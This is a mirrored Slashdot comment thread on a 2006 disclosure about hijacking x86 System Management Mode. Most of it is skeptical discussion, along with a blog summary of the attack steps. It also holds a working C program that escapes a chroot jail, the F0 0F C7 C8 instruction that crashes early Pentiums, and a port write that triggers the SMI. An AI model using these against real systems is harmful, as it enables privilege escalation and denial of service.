Slashdot Mirror
Pentium Computers Vulnerable to Attack?
An anonymous reader writes "One of the latest security scares is coming from security experts at CanSecWest/core '06 in the form of a possible hardware-specific attack. The attack is based on the built-in procedure that Pentium based chips use when they overheat. From the article: 'When the processor begins to overheat or encounters other conditions that could threaten the motherboard, the computer interrupts its normal operation, momentarily freezes and stores its activity, said Loïc Duflot, a computer security specialist for the French government's Secretary General for National Defense information technology laboratory. Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.'"
physical access means the h4x0rs can take over your computer now, news at 11.
What am I missing here? If they already have that much access to the system, aren't you already screwed?
someone could do the same with ANY interrupt handler... oh wait... an MMU would protect against that.
Not alot of details about what chip families are effected... Does it cross over to AMD chips?
Physical access trumps all security. Everyone knows this. This really isn't news, just an interesting new exploit that happens to affect a lot of... systems that are already vulnerable from the same people in the same situation.
Move along, folks.
I pretend to know more than I really do by mooching off google and wikipedia.
So anyone have any idea which Intel Pentiums processors that are affected by this? Every Intel processor with overheat protection?
The article states this could be a problem for all x86 processors. Do older processors even have heat management? Also, wouldn't you need admin access to the system to be able to trigger this?
Open source is like a British car. Not only can I get under the hood, I seem to spend a lot of time here.
This hack assumes that the intruder already has write access to the nvram of the system. Also, the headline is just a cut/paste of a small portion of a poor article with few technical details. There is no PoC code, nor any specific chip mentioned. The headline refers to Pentium chips specifically and the articles says "any x86 based architecture, needless to say these are not interchangable terms... Shame on you Slashdot editors for posting this garbage...
-*The above statement is printed entirely on recycled electrons*-
How is it that an unprivileged user can write to such a sensitive location in the first place?
Bogtha Bogtha Bogtha
I am so glad that we have legions of Security Experts to protect us against every possible Rube Goldberg attack out there. Thanks to their tireless commitment to security, I can sleep safer at night by knowing that no one will take a blowtorch to my processor, install custom software, and then override the security safeguards that they could have gotten through by booting into safe mode. These people are truly a God-send. </sarcasm>
Javascript + Nintendo DSi = DSiCade
Duflot could be translated from french to "From The Flow"
Remember that old Good Times virus hoax? People who were In The Know knew that it was a hoax because it claimed that, just by opening it, it could physically destroy your computer.
:)
Then a few years later, Microsoft brought us Outlook with automatic attachment opening, making the first part possible, and now Intel has given us the potential for the second part.
Good Times apparently wasn't a hoax, it was just ahead of its times.
I'm no security expert, but I don't see how this inherently indicates any particular vulnerability:
Cyberattackers can take over a computer by appropriating that safeguard to make the machine interrupt operations and enter System Management Mode, Duflot said. Attackers then enter the System Management RAM and replace the default emergency-response software with custom software that, when run, will give them full administrative privileges.
How do they 'enter System Management RAM'? Presumably this is a local attack where you plug in some hardware to do this while the computer is asleep. How could this possibly work over a network? You also have to make the machine overheat...
Any more knowledgeable speculation on the real threat posed by this?
Cool, another reason to switch to Sun or AMD.
This attack would already require the malicious software to already be running on the machine and already have super-user access. Once you get there, it doesn't matter. The attack is worthless. Unfortunately, the article is short on details - so you can't tell if there is nothing to see, or if the report is just bad. I suspect there is nothing to see.
Along a similar vein, I have developed a martial art where I can kill anyone in one blow. It requires that my opponent is already tied-up, asleep, and I have a gun.
Exactly how is this news??? Are slashdot readers getting stupider by the day? With physical access anything can be broken, it's just a matter of a longer or shorter time lapse.
Pentium computers are vulnerable to baseball bats!
Seriously, if they have access then you are screwed anyways...
- Andrew
I meta-moderate because I care.
New Security Rule: Keep you wife's hair dryer out of the computer room!
It's not just about recouping losses, it is about making the criminals - and that IS what these people are - fear the consequences of creating this type of thing. It seems like almost every day some new exploit is announced and we all have to check systems, hope for a quick patch, worry about exposure, yada yada yada. I'm fed up with it as I'm sure most other admins are.
Get caught creating a virus? 50 years in prison.
You run a botnet? 50 years in prison.
You cracked into the Defense Department? Life in prison.
We need to stop slapping these a-holes on the wrist and make the punishment severe enough to deter at least SOME of them.
"I'm just here to regulate funkiness."
I remember the good old days when you could send the instructions F0 0F to the Intel CPU and voila... crash!
Meh.
This was a script for a Geekdom show..
I guess I didn't understand the article, but how are these people without any access (yet) to my system causing my CPU to overheat at will? Does this have to do with global warming and my AC crapping out? EH? I knew it was a damn conspiracy against me!
*/equip [EpicTinfoilhat]
More seriously why do they say Pentium at the top and any x86 later on... those don't mean the same thing...
Matt
You have 1 Moderator Point! Use it or lose it! Is that a threat? -vapid
This is fantastic..now Antivirus tools can start monitoring my PC's temperature...anything above 98F and we've got to call the doctor.
Hellooooo: When the processor begins to overheat...
Keeping the computer cool is most certainly on topic!
P.S. Strawberry works best.
So, if I have a real firewall setup and I don't open every attachment I'm sent, I'm still safe, right? At the end of the day, you still have to run the exploit for it to work. So, how is that any worse than the rootkits running around at the moment? The vast majority of viruses still specifically depend on users who haven't hardened their systems.
I scream. You scream. I assume that means we're both acquainted with the problem. We proceed.
Man, I better switch to AMD so I won't have to worry about viruses! *rolls eyes* Interesting info no doubt, but I hope this doesn't turn into an AMD is teh better fanboy episode... oh wait this is slashdot.
What??? Overheat? So what does attacker have to do, block off all air holes? And what??? System Management RAM? You mean, like Remote Management module like HP's iLO access?
I heard, act of God includes "stupidity".
"Don't let fools fool you. They are the clever ones."
Just as dangerous, system analysts discovered an intruder can come with a CD, install malware and run it.
To protect yourself from an attack, it's recommended to never install anything on your computer and remove all sort of input devices such as USB ports, CD-ROM-s, floppies.
Turn it on?
It was a joke! When you give me that look it was a joke.
"You also have to make the machine overheat..."
They're Intel. No effort required.
Just went and RTFA, and I'm frustrated by a lack of hard details about the new threat:
:-(
- The article states that all x86 processors "could" be vulnerable. Does that mean the *entire* series of Pentium chips, even the older PIII and PII's? If so, are they equally as easy to compromise as the modern versions?
- There is no mention of AMD architecture. Doesn't AMD have an equivalent "overheat failsafe" halt-and-cooldown function? Wouldn't that make AMDs vulnerable to this type of exploit as well, or do they require a slightly different attack?
- Isn't the motherboard BIOS FlashROM responsible for the monitoring of and responding to dangerous CPU temperatures? Haven't they already been safeguarded against unauthorized writes, due to the Chernobyl virus?
I think I'll hold off on ordering the prototype Borg implants when they come on the market....
"All hands, BRACE FOR IMPACT!"
You were 80% angel, 10% demon. The rest was hard to explain. - Over The Rhine
"Math in a song is good."-Linford
of falsehood, and to execute such a thing you'd be at a low enough level to wreak havoc anyway.
Yet another reason AMD is better than Intel!
Why? I don't think anybody immunized AMD against screwing up, they are just as capable of it as Intel.
I wonder if this affects the new Intel Macs?
I'll reserve the right to modify my opinion after familiarizing myself with the details of the nature of this vulnerability. As a first guess I'll hypothesize that this probably depends on how easy the OS running on the affected Intel box makes it for a remote attacker to exploit this hardware flaw.
Only to idiots, are orders laws.
-- Henning von Tresckow
to use some other exploit? I mean the steps and time involved to use this would be too long to really be effective, since you have to wait until the machine actually overheats to get to this situation. What's the MTBF for a CPU fan these days? 50-70K hrs? They'll be waiting a while to gain admin access.
Supplies!
I'm interested in how a foreign company is in effect competing with Intel not by being a better vendor to Intel's customers, but by being a more demanding customer than Intel's other customers. They're really only half competing, by threatening the value of Intel's products perceived by the market, the same way a competing vendor would, though they're not doing the other half: offering a competing product that offers better perceived value to the market. Another vendor could do so, finding half their competition process already done for them,
Technology industries used to be nearly entirely "supply-side": driven by suppliers. Unpredictable innovation requiring risky investment, costs of production scaling and distribution, securing free-flowing intellectual property all defined a market always hungry for something newer, faster, smaller, safer. The market itself helped control the industry mainly to the extent that suppliers could guess what the market wanted. We're seeing the market gain power over the industry in many ways. Now we're seeing consumer processes actually resemble competition previously only performed by other producers.
--
make install -not war
If the physical location of your servers is compromised, no amount of security software can save you.
ELOI, ELOI, LAMA SABACHTHANI!?
Karma: Chameleon (mostly due to the fact that you come and go).
This is pure FUD, why is it even posted here? The article was mildly interesting but the title was misleading and blatantly AMD fanboy. While I realize that is popular around here give me a break... if you want a real processor war do it on fair grounds, not mud slinging.
booting from cd found to allow hackers to change root password
I can't find the actual paper anywhere, but this blog posting has way more details than the article originally linked ...
Very interestingly, Windows XP is not vulnerable, but OpenBSD is.
My Intel machine has Linux and my Windows Machines are AMDs
Thanks to file sharing, I purchase more CDs
Thanks to the RIAA, I buy them used...
Oooo, it's sooo hot. yeah, baby... yeah, daddy like... daddy like...
"Don't let fools fool you. They are the clever ones."
Relax, I just got an email (that Thunderbird thought was a scam - you truly do get what you pay for...) with a link in it that automatically downloaded me a new processor (Pentium6 baby)...
I ran it, and now my computer is "resting" for a few days.
Take that Loic Duflot
(if you want the link, just let me know, and when I boot up my new 6, I'll send it to you)
--
I just put some lightnin' in my Dell
Let me get this right, by DoSing the proc someone can overwrite the embedded code on the chip? If someone already owned the box and were to use this, it sounds like it would be the ultimate rootkit. Place in the proc, then when the system is hardened/reloaded initiate another DoS (lots are available for winblows) and viola instant re-infected Zombie PC.
Or am I confused?
How do you even get it to overheat to begin with?
Well I generally like to compliment it on how pretty it's power on indicator is.
Then I might buy it something small, superfluous and pretty like a tennis bracelet or an X800 Radeon.
After that I start gently caressing it's biometric module.
That generally gets it pretty hot...
I am disrespectful to dirt! Can you see that I am serious?!
On a scale of 1 to 10, I think this threat is somewhere between 0.5 and 1.5. There are so many better ways to invade a computer than to somehow sneak this on there and wait for the machine to overheat. Especially now since the vunerability has been exposed, I'm sure the bit time virus vendors will now write code to look for it.
Sure it is probably possible, but then I suppose it would be possible to retrofit my truck into a boat. Heck, it would probably be easier and faster to do that than it would be to build and execute (in the wild) an exploit based on this.
This reminds me of the vulnerability in the operating system that shipped with the Univac 1100/10. The checkpoint/restart facility allowed you to write a checkpoint image to tape. Part of the checkpoint image was the system status register.
The crack:
1. Checkpoint your job to tape.
2. remount tape.
3. fiddle the executive-mode bit in the dumped status register.
4. remount tape.
5. restart job -- mainframe p0wn3d.
Of course, in those days, a student that could do that was quickly hired into the system programming staff so that they could keep a closer eye on him and also get some productive work from him.
Ohh... BTW... if you can find an 1100/10 these days, it won't work any more. They fixed that about the same time they quit making CPU's out of vacuum tubes.
I wish Intel would create new bugs, instead of just repeating old ones. Copycats.
Just think, the script kiddies that pulled this off are now drawing Social Security.
Not only do you receive a convenient olfactory signal to alert you to the situation, but you also avoid security breaches brought on by overly complex thermal management.
The article does NOT explain how the hacker is able to replace the "emergency-response software" in System Management RAM. Normal applications, running at priviledge level 3, don't have direct access to SM RAM. Only code running at priviledge level 0, such as kernels and device drivers, can directly access SM RAM. But, if you can manage to run code at priviledge level 0 to access SM RAM, you don't need to replace the code in SM RAM to take over the system.
As was inferred by at least one other comment, the article describes a "Rube Goldberg" approach to hacking a system. While potentially entertaining, the method is overly and unnecessarily complicated to achieve the end result.
That was the sound of the GP going right over your head.
"I'm just here to regulate funkiness."
Recently, researchers discovered a new hardware specific attack that could render virtually all computers vulnerable to attackers. They said that if an attacker gains access to the keyboard, they could inject any arbitrary code into the system and gain administrative privilages.
Do not leave your servers out in the open, lock them in a controlled access room (perhaps climate control as well). Throughly vet who gets into your server room. Additionally, do not let people who have low access levels access 'low levels' of the machine. This is revolutionary... in 20 years I can see it being commonplace for companies to have a "server room" outstanding research guys.
I made this post "Captain Cliche" enough for people to get it. Obviously not.
"I'm just here to regulate funkiness."
I remember someone once mentioning that a certain kind of computer (quite old, I forget which) could be forced to shut down by repeatedly using gates/ram directly beneath the temperature sensor.
This kind of thing should be possible remotely, as an unpriveleged user, and also doesn't require the system to actually overheat, just those few gates.
Try F0 0F C7 C8.
LRC, the best-read libertarian site on the web
ALERT!
Pentium based machines are also vulnerable to a denial of service attack from a hacker with physical access to the machine and in the possession of a large axe. Should the attacker be wielding a pair of axes (one in each hand) then the attack would constitute a distributed denial of service.
Fear: When you see B8 00 4C CD 21 and know what it means
Did it specifically say that the machine had to overheat in order to take advantage of the exploit? or did they figure out how to trigger it remotely?
Windows has more viruses because linux has more virus coders.
Q: Oh hello Bondm be careful now, that table has a lot of expensive equipment on it. Bond: Can I surf for some p0rn on this computer? Q: Now Bond! Pay attention! That's your next target trainer. You just take this roll of duct-tape... Bond: I know, and use it to tie the hands of Mr Moto's gal-pal tot he bedposts? Q: No! Bond: What other possible use could there be for this stuff?? Q: Oh Bond, you take a piece of it and, while sipping a Martini, (shaken, not stirred) with one hand, you surreptitiously slap the piece over the arch-vilian's computer's FAN. Bond: Sigh, how prosaic! ... Then do I tie up the bimbo?
Q: No, Bond, you make dashing small talk and repartee with the bad guy, while you pull this little floppy disk out of your pocket...
Bond: ANd sling it at his neck, decapitating him?
Q: No, you reboot the computer so it boots up from the floppy into unprotected mode, then AUTOEXEC.BAT copies our file to OVERHT.DLL. Then in a few minutes the computer overheats and the overheat interrupt calls out code! Brilliant work by my boffins I think!
Bond: Well, if I werent just as dumb as Sean Connery I'd wonder why you have the overheat handler do the dirty work, as our rebooting could have done the same thing.
Q: Now Bond, do yo think anybody would want this movie to be over by the first reel? There has to be omimous music, brooding shadows, knives in the back, and so on. We can never do the obvious things.... You should know that by now...
Bond: Sigh, you're right as usual Q. DLL patching it is.
Since the Rag, of which this article is a part, supposedly targets government institutions, this could be important information for some.
t c. nature.
Yes, it is true that physical access "trumps" any other security issues. However, if a person has physical access to a system, it could be quite possible that this system has several other safeguards enabled on it to prevent access to any files stored on it. So, somebody being able to pop in a bootable CD that can boot the system, run some CPU-intensive code on it (thereby overheating the CPU), and then inserting the code to circumvent those extra security measures, could (in theory) gain access to those secure government files*.
Be it for corporate/government espionage, I could see this being a valuable tool for data acquirement, for the purpose(s) of personal, monetary, technological, military, personal (etc.) gain.
*Files: Could include top secret data of a -> military/pornographic/intelligence/pornographic/e
So, here's a link to the actual PowerPoint presentation. Don't just click on it without reading the caveats below.
He has a sample exploit there on an OpenBSD system.
Here's the guy's bio from the talk:
Loïc Duflot
Security Issues related to Pentium System Management Mode
Loïc Duflot is a security engineer and researcher for the scientific division of the french Central Directorate for Information Systems Security in Paris. He is also a 2nd-year Phd student in Paris XI university. His research work is mostly focused on the security aspects of interactions between hardware components and software. He's also interested in innovative hardware attacks on cryptographic tokens and smartcards.
Note that the French have one of the best security agencies in the world. The main caveat is whether there's anything in the PPT presentation which can exploit your system. I wouldn't put it past the French whatsoever. So, you might be wise to view the presentation on a secure system of yours (preferrably not an x86 one? :) ).
The best way to predict the future is to create it. - Peter Drucker.
It was also based a little in reality - CPUburn could theoretically destroy an improperly heat-sinked CPU by running massively heat-generating instructions in a tight loop that was entirely in L1 cache.
So, physical destruction could happen. It was extremely rare - most OS' are designed to place limits on program activity, and I know of only two Real World examples of such software that existed in the wild - but it was NOT unknown.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
i think it is time for all of us to buy new AMD's. And so does cashdot. love the amd ad on this page. so much for being reputable.
God Bless America. No, I mean my god not yours.
Pentium Computers Vulnerable to Attack?
YES! Nothing to see here, please move along.
He who knows best knows how little he knows. - Thomas Jefferson
Having said that, I believe B3 security mandates that memory and other system resources have mandatory access controls for precisely this sort of reason - a user who already has system access would then be unable to exploit that to gain control of other parts of the computer. Typically, such containment is through hardware, so unless you embedded a suitable driver into the virus code, interrupting the OS wouldn't gain you anything.
On a side-note, the Broadcom Sentosa system (based on the BCM1250 processor) has a bug such that any fast maths routine will reboot the system. Explains why a lot of people hate Broadcom.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
Seems like nobody was sharp enough to google, find the slides, and provide a link:p t
http://www.cansecwest.com/slides06/csw06-duflot.p
Don't bother with the moronic article -- get the PowerPoint slides from the presentation at CanSecWest at http://cansecwest.com/slides06/csw06-duflot.ppt
My xt should be ok
What i'm using a 8086 instead of the 8088
Noooo
Including a link to the presentation .ppt
http://asert.arbornetworks.com/2006/04/jumping-thr ough-hoopshhhhhrings/
> The exploit requires escalated privileges to begin with. The only thing it can currently
> be used for is bypassing secure levels inside of OpenBSD, where you already have root.
People, think this through a bit and some more dangers appear. If root can replace System Management Mode there are some interesting possibilities for evil. SMM runs at permission levels beyond ring0, think of it as ring-1. From there you can escape any virtualization, any chroot jail, probably even escape from inside an emulator like VMWare if you can manage to execute the exploit without the emulation catching it and simulating it. Until this is completely understood and fixed, Xen, usermode linux, chroot and possibly VMWare/VirtualPC should be suspect.
Now imagine just how many people have root access to their virtual server at a hosting company and how many other users are running on the same physical hardware secure in the belief that their customer information is safe. But is it?
Democrat delenda est
with a magnifying glass, focusing a beam of sunlight on pentagon computers...
film at 11
/\/\icro/\/\uncher
As has been repeated, physical access beats all. Here's an easier way, why not just boot into a knoppix live cd, mount the disk and circumvent all security? Kind of like beating Adobe's security by simply using Ghostscript.
From : http://blog.ncircle.com/ (scroll down)
cansecwest/core06: "security issues related to Pentium SMM"
Loic Duflot
Title: Security Issues Related to Pentium System Mgmt Mode
It is day 2 at Cansecwest and this talk wins for 'so frightening that you want to hide under your desk in the fetal position'.
I'll go through the high level technical and then end with pointing out a principal that is one of those universal truths I carry around with me everywhere.
This entire exploit is based on documented x86 functions.
Your CPU runs in a few modes, one of those modes is known as Protected mode, other known as System Mgmt Mode. When your OS is running, your in Protected mode and this is how much of the security is performed and you'll hear of ring0 and ring3. Just know that your in-world universe is in protected mode.
System Management Mode (SMM) is used so that when there is something external to your OS world like say a thermal condition that needs to communicate some message, the CPU saves all its protected mode state out, does all this SMM stuff and then return to its regular scheduled program in protected mode.
There are details that evolve registry addresses and very low level operations but for the most part, a system in a very secure state can be circumvented via this SMM facility. I'm talking free access to all memory and IO.
The song goes a little like this:
Enable SMI
Open SMRAM space
Replace default SMI Handler by custom one (do your duty)
Close SMRAM space
Trigger SMI
Gain access to restricted operations.
In the wider picture: works on most systems. Turns out that Linux and the *BSD's will fall victim to this attack strategy, however, Windows XP is not known to be exploitable because of a few system calls that are not present and more importantly a certain memory range in protected mode is not shared addresses to SMM.
So, for the demo, they did not pick some shabby OS to exploit. How about OpenBSD at level2 (high security) with allowaperture=1
Ummm...it worked. Theo, microphone please?
Theo spoke to this OPENBSD issue and said he and the team have known about it for a year. They are between a rock and a hard-place because Xserver is really the core of the problem. It has too much damn access to regesters and is in the most unfortunate address space in protected mode because when in SMM, what is in that address range can be used to exploit.
Solution is for Xserver people to abstract sufficiently so that the kernel can have more governance on the Xservers logic.
Closing TK comments:
A system or a world that has a policy governed by in-world mechanisms cannot be effective when a process in-world can reach to the out-world to cause in-world change. You could also say that since a problem cannot be resolved at the same logical realm it has been created, then it is also the case that the most effective governance of a world can only come from outside that world. Think about all the crazy things we do in the physical world. As soon as we could get to the strong and weak forces at the atomic level, we created a incredibly destructive device. I just hope that if string theory is right and there really are energy strings at the lowest level of the universe, that no one in our world get control of them. The negative outcome caused by the power hungry is too high a risk to even consider the positive benefits.
Its late and I have been blogging way too much today I am certain that my mental packet loss is abnormally high. I'll return to this in-game out-game concepts later in another blog entry, when I am less sleep deprived.
--tk
http://hardware.slashdot.org/comments.pl?sid=1827
Not if you can find a way to have the target heat up with a user account.
8 6&cid=15108037
Better article: http://hardware.slashdot.org/comments.pl?sid=1827
On an AMD or Via, overheating is a major failure condition, probably caused by a heatsink falling off.
As a longtime AMD and VIA user, I would call bullshit on that. With VIA, certainly (my Epias are rather low power, lower heat), but most of my AMD's have run rather hot-ish
K6-2/400 - Same as P-II
"Thunderbird" 700Mhz - Not hot, but no cooler than the same-gen Pentiums.
Duron 1Ghz - Power-hungry and hot enough to raise the room temperature noticably when run in a server
Athon XP 2500+ - Holy-freakin' heatwave batman, this chip ran warm indeed. I stuck a "Volcano" fan on it to keep it happy during heavy operations, but then it sounded like well... a vaccuum cleaner. When I accidentally turned the fan down during some heavy operations it hit 100c between thermal throttling kicked it off (though it should have dumped a lot earlier).
Wewl, to begin wit, you puon Nelly. Den it gits hot in hea.
Why figure out something tricky and clever like an overheat-interrupt-security-rescue-procedure-overw rite-thingamajig when all you gotta do is send mails with an "for infection please click here" buttons?
Works just as fine.
We used to have a Bill of Rights. Now, with the rights gone, all we have left is the bill.
AthlonXP chips had no built in throttling in the chip. As a result, motherboard makers built in a crude protection system that would shit down the entire system if the chip got too hot. Without that protection, the chips would burn themselves up if the fan failed.
G
New AMD (Sempron 64/Athlon 64/Athlon X2 64, Turion) all have "Cool N' Quiet" built in which throttles the chip down to speeds as low as 1Ghz (even lower on Turions I think) when idle. I have a dual core athlon system now, and my chip sits at 1Ghz/1.1 volts and mt CPU fan runs at 1000RPM when my computer is idle. When you launch an app that demands processing power, the chip instant throttles up to it's full speed/voltage and the fan kicks up to 3000RPM.
Pictures:
http://www.toadlife.net/stuff/forum_pics/idle.PNG
http://www.toadlife.net/stuff/forum_pics/inuse.PN
I don't always use unix-like operating systems; but when I do, I prefer FreeBSD.
http://www.cs.princeton.edu/~sudhakar/papers/memer r-slashdot-commentary.html
/.'d back in '03. *Kind of* similar.....
Yea, it was
I Attacked a pentium PC with a sledgehammer. It was quite vulnerable.
Okay, a rock will do.
Considering:
- that the hacker would need really good access to your pentium computer in order to do such exploit.
- that if the processor overheats then some hacker gaining administrator access is the least of your problems.
- that windows and internet explorer are still quite popular
There are plenty of more effective and practical ways to take down PCs , seriously.
Copyright infringement is "piracy" in the same way DRM is "consumer rape"
If you've got root in a chroot "jail", you already own the machine. To break out of jail, just use a program such as the following (... and pass it a subdirectory within the "jail" as argument):
#include <stdio.h>
#include <unistd.h>
void main(int argc, char **argv)
{
int i;
if ( argc < 3 ){
fprintf(stderr,"Bad argument count\n");
exit(1);
}
if(chroot(argv[1])){
perror("chroot");
exit(1);
}
for(i=0; i<137; i++)
chdir("..");
if(chroot(".") ) {
perror("second chroot");
exit(1);
}
execv(argv[2],argv+2);
perror("exec");
exit(1);
}
N.B. BSD jails do sth more than just chroot. However, on most Unices, relying solely on chroot to keep an attacker "prisoner" is foolish...
Some filler garbage to pass the postercomment compression filter (sorry):
Pourquoi mon chat est il malpropre?
En médecine vétérinaire, le problème de comportement inapproprié le plus fréquemment rencontré chez le chat est celui de la malpropreté. Minou fait pipi ou caca en dehors de la litière et le propriétaire ne sait pas quoi faire.
C'est donc normal que cette question nous soit très souvent posée! Et nous tenterons de faire un résumé de l'approche que vous devrez prendre afin de rapidement faire cesser ce désagréable problème.
Il est entendu qu'il est impossible pour nous d'analyser via Internet, par téléphone ou sur le bout d'un comptoir chaque cas de manière individuelle car trop de variantes entrent en ligne de compte et une consultation avec NATUROPATHE spécialiste en thérapie comportementale peut facilement durer plus d'une heure pour ce genre de problème.
Afin de bien vous faire comprendre les étapes à franchir lors de ce type de consultation, voici une série de questions que l'on doit absolument demander au propriétaire du chat avant de pouvoir poser un bilan puis d'envisager des pistes de solutions. Car en fait, il existe trois formes de malpropreté: les souillures d'élimination, le marquage et l'incontinence. Le questionnaire ci-dessous et l'examen physique de l'animal nous permettront avant tout de les différencier et surtout d'éviter les fausses pistes. Par la suite seulement, nous serons en mesure de vous faire les recommandations qui s'impose.
1. Combien d'autres chats ou d'animaux avez-vous à la maison?
2. Quelle est la relation entre ces animaux?
3. Comment avez-vous identifié le coupable? Depuis quand et comment le problème a débuté?
4. A quelle fréquence le chat est malpropre? (quotidiennement, quelques fois par semaine, par mois)
5. Quels sont les trucs que vous avez utilisés pour changer cette mauvaise habitude (corrections, changement de litière, isolement, etc)?
6. Est-ce que vous avez déjà vu du sang dans l'urine de votre chat?
7. Quel type de nourriture mange votre chat?
8. A-t-il déjà souffert de cystite ou de problème urinaire?
9. Votre chat souffre-t-il parfois de diarrhée?
10. Votre chat souffre-t-il parfois de constipation?
11. Arrive-t-il parfois que du caca reste pris dans le poil près de l'anus?Combien d'animaux avez-vous à la maison?
12. Est-ce que votre chat et les autres sont stérilisés?
13. Dans quel ordre en avez-vous fait l'acquisition?
14. Combien avez-vous de bacs à litière par chat?
15. Avez-vous des bacs à litière avec couvert?
16. Quelle est la grandeur de leu
...technical articles.
Where to begin.
First off, none of the low-power states C0->C4 stash to a system management RAM (yet). Second, the lower Cx states flush the cache, but they don't flush in response to heat, in that case they perform a Geyserville transaction which lowers frequency and voltage. Only if you exceed the thermal diode does it go tits-up. Now there's word it may save state in future Cx states, but I sincerely doubt anyone would be able to get inside the on-die ram, since it will sit behind control register busses. You might as well hack the ucode -- which hasn't been done in over 13 years of existence.
Getting back to the low-power C4 states, this is the same thing that occurs when HALT is executed. If someone has the technology to invade motherboard ram, or to invade the page table, then of course they can break this, but it is by NO MEANS TIED JUST TO INTEL CHIPS.
This idiot spouts off two paragraphs of something he barely understands, and then fills the rest with panicked-fluff.
Let's all move along. Nothing to see here.
https://www.accountkiller.com/removal-requested
This could be combined with the recent OSX flaws to make a really hard to clean, nasty MacWorm.
:-)
More FUD~!
-JP
This seems very short on detail and ignores a few key points.
Access to the System Management RAM is controled by the chipset. Generally there is a write once bit that when set prevents access to the RAM from normal operating mode. The BIOS loads SMM RAM, then sets this bit before booting the OS. So the only way an attacker could gain access to SMM RAM is to hack the BIOS or use hardware means (ICE).
As an example, the base SMM RAM lies 'under' VGA memory at 0xA0000. When SMM is entered the chipset routes accesses to DRAM instead of passing them to PCI and the video card.
Save the DOS prompt: It's an endangered species!
But it looks like there may be something real here.
The presentation lists events that will trigger a System Management Interrupt (SMI) and enter System Management Mode (SMM). Overheating is only one of them. Another is "century rollover". Taken literally, that would mean that anyone who could set the clock to 11:59 December 31 1999 [I'd say 2000 but I doubt the chip is mathematically correct] can enter SMM without needing physical access to the machine or to the circuit breaker for the air conditioning. Or to use the presentation's example, outl(0xB2, 0x0000000F);.
If I read this problem report correctly, then a process outside of SMM can write to the memory for SMM. (Controlled by the D_OPEN bit in the SMM control register).
So it looks like you can do it without physical access, where "it" is a privilege escalation that *starts* from root. That's getting less absurd all the time as virtualization and technologies like SELinux become more common. Also allows planting a deeper-than-root rootkit. You could escalate to God of Hardware or in the CanSecWest example to "root at securelevel -1".
Maybe I should email Duflot for details and write up something for my nerdish security blog
This vuln doesn't really mean much to general users. However, users who have Intel procs on secure cards (tamper resistant) should worry a bit. Generally, we try to control things on secure cards like thermal leakage (especially key bits).
However, if you attack the driver of a secure card at the same time as you are thermally stressing it, you may be able to take it over, extracting the key data without triggering the tamper evident seals.
Fortunately, security cards that I am familiar with do NOT use Intel processors.
But, as an attack on the "garden variety" home PC, this would be horrible overkill.
Ratboy
Just another "Cubible(sic) Joe" 2 17 3061
I slowly remove my fan on my intel box to see if haxors are going to take over my machi/%"& (connection lost)
In order to form an immaculate member of a flock of sheep one must, above all, be a sheep.
say what ?!
If you can get into the machine to change the fans, you probably don't need to overheat the system to gain control,becasue you already have control
The Kruger Dunning explains most post on
I knew there was a reason to use AMD64
There is a D_LCK bit on most chipsets that prevents any software, including BIOS from changing SMM RAM (as the FTA states), unless the CPU is already in SMM mode.
So,
1. BIOS loads its SMM code into SMRAM
2. BIOS locks down SMRAM region (D_LCK bit=1)
3. No Profit for hackers!
This article is just FUD.
On a similar tip, the old BBC ModelB Micro (I think it was the B) came with a NiCad battery as an option to keep the system clock running while not in use. It was considered very flash at the time but there was a serious problem. The recharging circuit was under software control and it was very simple to hack into the kernel and just tell the battery to charge permanently. If you do that to a NiCad sooner or later it either explodes or catches on fire which happened at least once I believe in the UK. Can't find any links about this now, I remember it from the time.
spoonerize "magic trackpad"
This would be a great vector to allow debugger-class access while a secure program is running. Think about it, a DRM protected program can do all it wants to prevent other programs poking around its memory space. Signed ring 0 device drivers are certified to not poke around in DRM protected software. This is another source of unsigned code that you can trigger whenever you like. Attacking the BIOS was the path to hacking the XBOX, and this could be the way into Vista-generation protection. Just think, you could modchip your own PC!
I didn't say burn, I said overheat. As the machine that reached 100c (boiling for water) was still in use up to last week when I upgraded, I'd say that it's a pretty hardy little chip...
It *did* definately start flaking out before I rebooted and found it at such a high-temperatures... so I doubt that long-term use at such temperatures would be good for any CPU, even AMD
What the replies here (and I think the presentation to some extent) have missed is that SMM isn't ring 0, it's ring -1. In SMM you can do things that the processor hardware normally prevents, like creating invalid/illogical page table entries. Since SMM bypasses any hardware-enforced checks, you can set the processor up to do... surprising things. This security risk was AFAIK first discussed in http://www.amazon.com/gp/product/0387953876/sr=8-1 /qid=1144813279/ref=sr_1_1/102-2091912-1657751?_en coding=UTF8
Umm...
Interesting. If the universe was really just a program running on some sort of 'god machine' and you could get low-enough level access to the physics (the ability to tweak individual bits), and if the 'god machine' had a hardware vulnerability under specific conditions, maybe with a big enough explosion you could overflow something, gain 'ring -1' access, and re-write reality.
Just a thought...
Actually, the last byte can be any value from C8 to CF. The mnemonic for the F0 0F C7 C8 instruction would be "lock cmpxchg8b eax". Specifying any register as a parameter to cmpxchg8b is illegal, and it's the "lock" combined with the delayed illegal opcode exception that confuses the Pentium 1 into freezing. C8...CF specify that the parameter is one of the 8 main registers.
Melissa
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
Maybe the quantization of the universe and its accompanying randomness are caused by floating point roundoff error in the god machine?
Melissa
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
How are you able to any of those sequence of operations if you are not *already* executing as root or as ring 0? If you already have control of ring 0 and/or root, you can do what you want to the computer already. SMM doesn't get you anything special, except perhaps the ability to mess with internal processor states you can't normally (make writable code segments in protected mode, for example).
By the way, whenever the CPU does a memory read or write while in SMM, it asserts the SMM# pin. This means that the hardware is fully able to consider SMM RAM to be totally separate from the main memory space - but most implementations don't. In fact, SMM has an instruction called "umov" that allows SMM hypervisors to read/write the main memory space. (umov is equivalent to mov when not in SMM.)
If it's *really* a problem, change the motherboard, not the CPU. The motherboard can physically lock out the SMM memory space from even kernel programs if it so desires.
Melissa
"Screw Sun, cross-platform will never work. Let's move on and steal the Java language." - Visual J++ Product Manager
I mean .... we should store all these people in big buidings, shove big hard problems in one end and see what comes out the other.
Stuff jail, send them to a big think tank, make em work for their crimes.
EMail: 0110001101100010010000000110001101110010 0110000101111010011011100110000101110010 0010111001100011011011110110
> - The article states that all x86 processors "could" be vulnerable. Does that
> mean the *entire* series of Pentium chips, even the older PIII and PII's? If so,
